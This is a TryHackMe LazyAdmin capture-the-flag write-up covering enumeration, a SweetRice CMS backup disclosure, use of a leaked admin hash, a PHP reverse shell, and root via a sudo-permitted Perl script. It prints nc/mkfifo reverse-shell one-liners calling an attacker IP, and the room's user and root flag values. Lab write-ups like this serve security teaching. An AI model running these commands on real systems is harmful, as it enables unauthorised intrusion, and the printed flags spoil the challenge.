Share
## https://sploitus.com/exploit?id=51336335-B6AC-5737-B72D-2B81B5504985
# LazyAdmin-Writeup
Beginner-friendly TryHackMe LazyAdmin writeup covering enumeration, web exploitation, credential discovery, and privilege escalation.
# TryHackMe - LazyAdmin Writeup
## Room Information
| Category | Details |
| -------------- | ----------------------------------------------------------------------------------------- |
| Platform | TryHackMe |
| Room Name | LazyAdmin |
| Difficulty | Easy |
| Skills Learned | Enumeration, Web Exploitation, Credential Discovery, Reverse Shells, Privilege Escalation |
---
# Introduction
In this writeup, I solved the **LazyAdmin** room on TryHackMe.
The objective of this room was to:
* Perform reconnaissance
* Enumerate services
* Discover vulnerabilities
* Gain initial access
* Escalate privileges to root
This room demonstrates how exposed backups, insecure CMS configurations, and weak privilege separation can lead to full system compromise.
---
# Reconnaissance
## Verifying Connectivity
Before starting enumeration, I verified that the target machine was reachable.
```bash
ping 10.48.149.136
```
The target responded successfully.
### Screenshot

---
# Nmap Enumeration
## Aggressive Scan
I performed an aggressive Nmap scan to identify open ports, running services, versions, and operating system details.
```bash
nmap -A -v -T4 10.48.149.136
```
## Scan Explanation
| Flag | Purpose |
| ----- | -------------------------------------------------------------------- |
| `-A` | Enables OS detection, service detection, NSE scripts, and traceroute |
| `-v` | Verbose output |
| `-T4` | Faster scan timing |
---
## Scan Results
| Port | Service | Version |
| ---- | ------- | -------------------- |
| 22 | SSH | OpenSSH 7.2p2 Ubuntu |
| 80 | HTTP | Apache 2.4.18 Ubuntu |
### Key Findings
* Ubuntu Linux target
* Apache web server
* SSH service enabled
* Potential hidden web application
### Screenshot

---
# Web Enumeration
## Accessing the Website
Navigating to the target IP displayed the default Apache page.
### Observation
The default page indicated:
* Apache was correctly configured
* No direct application was visible
* Hidden directories likely existed
### Screenshot

---
# Directory Enumeration
## Initial FFUF Scan
I used FFUF to brute-force hidden directories.
```bash
ffuf -u http://10.48.149.136/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```
---
## Results
A hidden directory named `content` was discovered.
### Screenshot

---
# Discovering SweetRice CMS
Navigating to:
```text
http://10.48.149.136/content/
```
revealed the target was running **SweetRice CMS**.
### Key Findings
* SweetRice CMS identified
* Site under construction
* Administrative references visible
* Potentially vulnerable CMS version
### Screenshot

---
# Vulnerability Research
## Searching for Public Exploits
I searched for publicly available exploits related to SweetRice CMS.
```bash
searchsploit SweetRice
```
### Interesting Result
```text
SweetRice 1.5.1 - Backup Disclosure
```
This vulnerability suggested that backup files could be publicly accessible.
### Screenshot

---
# Additional Enumeration
## Enumerating `/content`
I performed another FFUF scan against the `/content` directory.
```bash
ffuf -u http://10.48.149.136/content/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```
---
## Interesting Directories
| Directory | Description |
| ------------ | -------------------------- |
| `inc` | Included application files |
| `as` | Admin panel |
| `attachment` | Uploaded files |
| `_themes` | Themes |
| `js` | JavaScript resources |
| `images` | Image assets |
### Screenshot

---
# Exploit Analysis
## Reviewing Exploit-DB
The Exploit-DB advisory explained that SweetRice 1.5.1 exposed backup files publicly.
### Vulnerable Path
```text
/content/inc/mysql_backup/
```
### Screenshot

---
# Exploiting Backup Disclosure
## Accessing the Backup Directory
Navigating to the vulnerable directory revealed a downloadable SQL backup file.
```text
/content/inc/mysql_backup/
```
### Exposed Backup File
```text
mysql_bakup_20191129023059-1.5.1.sql
```
### Screenshot

---
# Inspecting the SQL Backup
## Reviewing Database Contents
The SQL dump was inspected locally.
```bash
cat mysql_bakup_20191129023059-1.5.1.sql
```
---
## Extracting Credentials
While reviewing the SQL dump, administrator credentials were discovered.
### Credentials
```text
Username: manager
Hash: 42f749ade7f9e195bf475f37a44cafcb
```
The administrator username and MD5 password hash were successfully identified.
### Screenshot

---
# Administrative Access
## Accessing the Admin Panel
Using the recovered credentials, I authenticated to the SweetRice administrative dashboard.
### Admin URL
```text
http://10.48.149.136/content/as/
```
Administrative access was successfully achieved.
### Screenshot

---
# Remote Code Execution
## Preparing the Netcat Listener
Before triggering the reverse shell payload, I started a Netcat listener.
```bash
nc -lvnp 5555
```
---
## Reverse Shell Connection
After uploading and executing the PHP reverse shell payload through the SweetRice CMS, the target connected back successfully.
### Reverse Shell Information
```text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
The shell was obtained as the `www-data` user.
### Screenshot

---
# User Enumeration
## Exploring the Filesystem
After gaining shell access, I enumerated the filesystem.
```bash
cd /home
ls
```
The user `itguy` was discovered.
### Listing User Files
```bash
cd itguy
ls
```
Interesting files:
* `backup.pl`
* `mysql_login.txt`
* `user.txt`
---
# Capturing the User Flag
## Reading the User Flag
```bash
cat user.txt
```
### User Flag
```text
THM{63e5bce9271952aad1113b6f1ac28a07}
```
### Screenshot

---
# Privilege Escalation
## Checking Sudo Permissions
I checked the sudo permissions available to the `www-data` user.
```bash
sudo -l
```
### Sudo Output
```text
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```
This indicated that the Perl script could be executed as root without a password.
### Screenshot

---
# Inspecting the Vulnerable Perl Script
## Reviewing `backup.pl`
```bash
cat /home/itguy/backup.pl
```
### Script Contents
```perl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
```
The script executed `/etc/copy.sh` with elevated privileges.
---
# Inspecting `copy.sh`
## Reviewing the Payload
```bash
cd /etc
cat copy.sh
```
### Existing Payload
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
```
The reverse shell payload needed to be modified to connect back to my attacking machine.
---
# Modifying the Reverse Shell Payload
Because the reverse shell lacked a proper TTY, editors such as `nano` failed.
Instead, I overwrote the file using `echo`.
```bash
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.204.24 6666 > /tmp/f' > /etc/copy.sh
```
---
# Starting the Root Listener
On my Kali machine, I started another Netcat listener.
```bash
nc -lvnp 6666
```
---
# Executing the Perl Script
I executed the vulnerable Perl script using sudo.
```bash
sudo /usr/bin/perl /home/itguy/backup.pl
```
This triggered the reverse shell payload as root.
---
# Root Shell Obtained
The target connected back successfully.
### Verifying Root Access
```bash
whoami
```
### Output
```text
root
```
---
# Capturing the Root Flag
## Navigating to Root Directory
```bash
cd /root
ls
```
The `root.txt` file was discovered.
---
## Reading the Root Flag
```bash
cat root.txt
```
### Root Flag
```text
THM{6637f41d0177b6f37cb20d775124699f}
```
### Screenshot

---
# Flags Captured
| Flag | Value |
| --------- | --------------------------------------- |
| User Flag | `THM{63e5bce9271952aad1113b6f1ac28a07}` |
| Root Flag | `THM{6637f41d0177b6f37cb20d775124699f}` |
---
# Conclusion
The LazyAdmin room demonstrated several critical real-world security issues:
* Publicly exposed backup files
* Weak password storage mechanisms
* Vulnerable CMS deployment
* Unsafe sudo configurations
* Insecure script execution
By chaining these vulnerabilities together, full system compromise was achieved from initial web enumeration to root access.
---
# Tools Used
* Nmap
* FFUF
* Searchsploit
* Netcat
* Kali Linux
* Exploit-DB
* Perl
---
# Disclaimer
This writeup was created strictly for educational purposes on the TryHackMe platform.
Do not attempt these techniques on systems without explicit authorization.
---